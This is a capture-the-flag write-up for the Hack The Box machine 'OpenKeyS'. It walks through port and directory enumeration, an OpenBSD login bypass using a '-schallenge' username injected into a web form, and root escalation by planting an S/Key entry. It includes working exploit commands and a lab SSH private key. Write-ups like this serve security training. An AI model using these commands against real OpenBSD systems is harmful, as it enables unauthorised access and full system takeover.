OpenKeyS

Completed on September 13, 2020

Overview

OpenKeyS was, at the time, one of the few boxes I had done where it revolved around exploiting published vulnerabilities. It was very fun and interesting to say the least. Even though it was rated as Medium, it was fairly easy to tackle if your enumeration was done right.

References

• OpenBSD Authentication Bypass and Local Privilege Escalation Vulnerabilities

• Qualys Security Advisory - OpenBSD Authentication Bypass / Privilege Escalation

Enumeration

Masscan: Finding Open Ports

Here, we will be looking for any open ports, both TCP and UDP to then find our attack path once further port scanning as been completed.

jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ sudo masscan -e tun1 -p1-65535,U:1-65535 10.10.10.199 --rate=1000 | tee OpenKeys_OpenPorts.log

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-09-13 15:13:54 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.199                                    
Discovered open port 22/tcp on 10.10.10.199

Nmap: Port Scanning

Using the log file created from the masscan execution, we will filter the port numbers to simplify our lives. In this case as we only have to ports to enumerate, we could've saved that step.

At this point in my process, I was relying on aggressive scanning, which is technically not necessary and should not be done if we do not want to be detected.

jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ PORTS=$(cat OpenKeys_OpenPorts.log | grep open | cut -d" " -f4 | cut -d"/" -f1 | xargs | tr " " ",")
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ nmap -A -sV -p $PORTS openkeys.htb -oN OpenKeys_PortScan.log -oX OpenKeys_PortScan.xml
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 11:18 EDT
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
|   256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_  256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open  http    OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.11 seconds
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ nmap -sV -p 22 openkeys.htb --script vulners
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 11:31 EDT
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.1: 
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|_    	CVE-2014-9278	4.0	https://vulners.com/cve/CVE-2014-9278

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.43 seconds

Gobuster: Directory Enumeration

Given the web service exposed, it is the next step into our enumeration. At the same time, we must note that everything goes and the OpenBSD SSH service must also be researched.

jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ gobuster dir -k -u http://openkeys.htb/ -w /usr/share/wordlists/dirb/common.txt -r -l -b 403,404 -t 50 --timeout 20s --wildcard 2> /dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:                     http://openkeys.htb/
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.0.1
[+] Show length:             true
[+] Follow Redir:            true
[+] Timeout:                 20s
===============================================================
2020/09/13 12:22:28 Starting gobuster
===============================================================
/css (Status: 200) [Size: 697]
/fonts (Status: 200) [Size: 1066]
/index.html (Status: 200) [Size: 96]
/index.php (Status: 200) [Size: 4837]
/images (Status: 200) [Size: 589]
/includes (Status: 200) [Size: 711]
/js (Status: 200) [Size: 582]
/vendor (Status: 200) [Size: 1522]
===============================================================
2020/09/13 12:22:57 Finished
===============================================================

Exploitation and Gaining Access

Inspecting /includes gave us access to a swap file. We need to retrieve it in order to inspect it offline.

jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ wget http://openkeys.htb/includes/auth.php.swp
--2020-09-13 12:40:05--  http://openkeys.htb/includes/auth.php.swp
Resolving openkeys.htb (openkeys.htb)... 10.10.10.199
Connecting to openkeys.htb (openkeys.htb)|10.10.10.199|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp’

auth.php.swp             [   <=>                ]  12.00K  29.4KB/s    in 0.4s    

2020-09-13 12:40:05 (29.4 KB/s) - ‘auth.php.swp’ saved [12288]

jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ strings auth.php.swp 
b0VIM 8.1
jennifer
openkeys.htb
/var/www/htdocs/includes/auth.php
3210
#"! 
    session_start();
    session_destroy();
    session_unset();
function close_session()
    $_SESSION["username"] = $_REQUEST['username'];
    $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
    $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
    $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["logged_in"] = True;
function init_session()
    }
        return False;
    {
    else
    }
        }
            return True;
            $_SESSION['last_activity'] = $time;
            // Session is active, update last activity time and return True
        {
        else
        }
            return False;
            close_session();
        {
            ($time - $_SESSION['last_activity']) > $session_timeout)
        if (isset($_SESSION['last_activity']) && 
        $time = $_SERVER['REQUEST_TIME'];
        // Has the session expired?
    {
    if(isset($_SESSION["logged_in"]))
    // Is the user logged in? 
    session_start();
    // Start the session
    $session_timeout = 300;
    // Session timeout in seconds
function is_active_session()
    return $retcode;
    system($cmd, $retcode);
    $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
function authenticate($username, $password)
<?php
bash

As you can see on line 15, we found jennifer as the potential user.

After researching the SSH banner information, it seems there are some vulnerabilities that we can attempt.

The OpenBSD Authentication Bypass Vulnerability CVE-2019-19521 is one that can be used against multiple service hosted on OpenBSD.

In this case, we can try -schallenge as user in the http request, but we need to specify the potential user jennifer in the request header, which we will provide along with the session cookie.

jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ curl -X POST -L http://openkeys.htb/index.php -d "username=-schallenge&password=admin" -H "Cookie: PHPSESSID=t3h374336g59i28aeiomgf6i9t; username=jennifer"
<!DOCTYPE html>


<html><head><title>OpenKeyS - Retrieve your OpenSSH Keys</title></head><body><div><h3>OpenSSH key for user jennifer</h3><p style='font-family: monospace, monospace;'>-----BEGIN OPENSSH PRIVATE KEY-----<br />
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn<br />
NhAAAAAwEAAQAAAYEAo4LwXsnKH6jzcmIKSlePCo/2YWklHnGn50YeINLm7LqVMDJJnbNx<br />
OI6lTsb9qpn0zhehBS2RCx/i6YNWpmBBPCy6s2CxsYSiRd3S7NftPNKanTTQFKfOpEn7rG<br />
nag+n7Ke+iZ1U/FEw4yNwHrrEI2pklGagQjnZgZUADzxVArjN5RsAPYE50mpVB7JO8E7DR<br />
PWCfMNZYd7uIFBVRrQKgM/n087fUyEyFZGibq8BRLNNwUYidkJOmgKSFoSOa9+6B0ou5oU<br />
qjP7fp0kpsJ/XM1gsDR/75lxegO22PPfz15ZC04APKFlLJo1ZEtozcmBDxdODJ3iTXj8Js<br />
kLV+lnJAMInjK3TOoj9F4cZ5WTk29v/c7aExv9zQYZ+sHdoZtLy27JobZJli/9veIp8hBG<br />
717QzQxMmKpvnlc76HLigzqmNoq4UxSZlhYRclBUs3l5CU9pdsCb3U1tVSFZPNvQgNO2JD<br />
S7O6sUJFu6mXiolTmt9eF+8SvEdZDHXvAqqvXqBRAAAFmKm8m76pvJu+AAAAB3NzaC1yc2<br />
EAAAGBAKOC8F7Jyh+o83JiCkpXjwqP9mFpJR5xp+dGHiDS5uy6lTAySZ2zcTiOpU7G/aqZ<br />
9M4XoQUtkQsf4umDVqZgQTwsurNgsbGEokXd0uzX7TzSmp000BSnzqRJ+6xp2oPp+ynvom<br />
dVPxRMOMjcB66xCNqZJRmoEI52YGVAA88VQK4zeUbAD2BOdJqVQeyTvBOw0T1gnzDWWHe7<br />
iBQVUa0CoDP59PO31MhMhWRom6vAUSzTcFGInZCTpoCkhaEjmvfugdKLuaFKoz+36dJKbC<br />
f1zNYLA0f++ZcXoDttjz389eWQtOADyhZSyaNWRLaM3JgQ8XTgyd4k14/CbJC1fpZyQDCJ<br />
4yt0zqI/ReHGeVk5Nvb/3O2hMb/c0GGfrB3aGbS8tuyaG2SZYv/b3iKfIQRu9e0M0MTJiq<br />
b55XO+hy4oM6pjaKuFMUmZYWEXJQVLN5eQlPaXbAm91NbVUhWTzb0IDTtiQ0uzurFCRbup<br />
l4qJU5rfXhfvErxHWQx17wKqr16gUQAAAAMBAAEAAAGBAJjT/uUpyIDVAk5L8oBP3IOr0U<br />
Z051vQMXZKJEjbtzlWn7C/n+0FVnLdaQb7mQcHBThH/5l+YI48THOj7a5uUyryR8L3Qr7A<br />
UIfq8IWswLHTyu3a+g4EVnFaMSCSg8o+PSKSN4JLvDy1jXG3rnqKP9NJxtJ3MpplbG3Wan<br />
j4zU7FD7qgMv759aSykz6TSvxAjSHIGKKmBWRL5MGYt5F03dYW7+uITBq24wrZd38NrxGt<br />
wtKCVXtXdg3ROJFHXUYVJsX09Yv5tH5dxs93Re0HoDSLZuQyIc5iDHnR4CT+0QEX14u3EL<br />
TxaoqT6GBtynwP7Z79s9G5VAF46deQW6jEtc6akIbcyEzU9T3YjrZ2rAaECkJo4+ppjiJp<br />
NmDe8LSyaXKDIvC8lb3b5oixFZAvkGIvnIHhgRGv/+pHTqo9dDDd+utlIzGPBXsTRYG2Vz<br />
j7Zl0cYleUzPXdsf5deSpoXY7axwlyEkAXvavFVjU1UgZ8uIqu8W1BiODbcOK8jMgDkQAA<br />
AMB0rxI03D/q8PzTgKml88XoxhqokLqIgevkfL/IK4z8728r+3jLqfbR9mE3Vr4tPjfgOq<br />
eaCUkHTiEo6Z3TnkpbTVmhQbCExRdOvxPfPYyvI7r5wxkTEgVXJTuaoUJtJYJJH2n6bgB3<br />
WIQfNilqAesxeiM4MOmKEQcHiGNHbbVW+ehuSdfDmZZb0qQkPZK3KH2ioOaXCNA0h+FC+g<br />
dhqTJhv2vl1X/Jy/assyr80KFC9Eo1DTah2TLnJZJpuJjENS4AAADBAM0xIVEJZWEdWGOg<br />
G1vwKHWBI9iNSdxn1c+SHIuGNm6RTrrxuDljYWaV0VBn4cmpswBcJ2O+AOLKZvnMJlmWKy<br />
Dlq6MFiEIyVKqjv0pDM3C2EaAA38szMKGC+Q0Mky6xvyMqDn6hqI2Y7UNFtCj1b/aLI8cB<br />
rfBeN4sCM8c/gk+QWYIMAsSWjOyNIBjy+wPHjd1lDEpo2DqYfmE8MjpGOtMeJjP2pcyWF6<br />
CxcVbm6skasewcJa4Bhj/MrJJ+KjpIjQAAAMEAy/+8Z+EM0lHgraAXbmmyUYDV3uaCT6ku<br />
Alz0bhIR2/CSkWLHF46Y1FkYCxlJWgnn6Vw43M0yqn2qIxuZZ32dw1kCwW4UNphyAQT1t5<br />
eXBJSsuum8VUW5oOVVaZb1clU/0y5nrjbbqlPfo5EVWu/oE3gBmSPfbMKuh9nwsKJ2fi0P<br />
bp1ZxZvcghw2DwmKpxc+wWvIUQp8NEe6H334hC0EAXalOgmJwLXNPZ+nV6pri4qLEM6mcT<br />
qtQ5OEFcmVIA/VAAAAG2plbm5pZmVyQG9wZW5rZXlzLmh0Yi5sb2NhbAECAwQFBgc=<br />
-----END OPENSSH PRIVATE KEY-----</p><a href='index.php'>Back to login page</a></div></body></html>

BINGO!! What we just retrieved is the SSH private key from 'jennifer'. Let's use it to access the system as this user.

jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ ssh -i jennifer.key jennifer@openkeys.htb
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019
 
Welcome to OpenBSD: The proactively secure Unix-like operating system.
 
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
 
openkeys$ id
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
openkeys$ ls
user.txt
openkeys$ cat user.txt
36ab21********************1d2b10

And we have found the user flag! Let follow on and attempt to escalate privileges by using a related vulnerability as the one we used against httpd.

Privilege Escalation

The vulnerability used to bypass authentication against httpd is associated as well with CVE-2019-19522, in which local privilege escalation can be achieved via S/Key and YubiKey. In this case, we will leverage S/Key.

openkeys$ cd /tmp
openkeys$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root
openkeys$ chmod 0600 /etc/skey/root
openkeys$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password:
S/Key Password [echo on]: 
Sorry
openkeys$ env -i TERM=vt220 su -l -a skey 
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN
openkeys# id                                                                    
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)

As shown above, by following the associated vulnerability specifications, we were able to escalate privileges. Now, let's grab the root flag:

openkeys# pwd
/root
openkeys# ls
.Xdefaults  .cshrc      .forward    .profile    .viminfo    root.txt
.composer   .cvsrc      .login      .ssh        dead.letter
openkeys# cat dead.letter                                                         
Date: Sun, 13 Sep 2020 15:40:02 +0000 (UTC)
From: root (Cron Daemon)
To: root
Subject: Cron <root@openkeys> /usr/bin/find /tmp -name "sess*" -amin +5 -exec rm {} \;
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <PATH=/bin:/sbin:/usr/bin:/usr/sbin>
X-Cron-Env: <HOME=/var/log>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
 
rm: /tmp/sess_gvhju8kvqk0m4dup24fhsm3c15: No such file or directory
rm: /tmp/sess_euod42diulnrrbir7cp2ehdioa: No such file or directory
rm: /tmp/sess_j094qg8rs6kpk76k7ukb5tlt0c: No such file or directory
rm: /tmp/sess_m447es74eb7k33ro5c66bs2hiq: No such file or directory
rm: /tmp/sess_hg0vdh8grjilq15r26da6b2um8: No such file or directory
 
openkeys# cat root.txt                                                            
f3a553********************fc6efa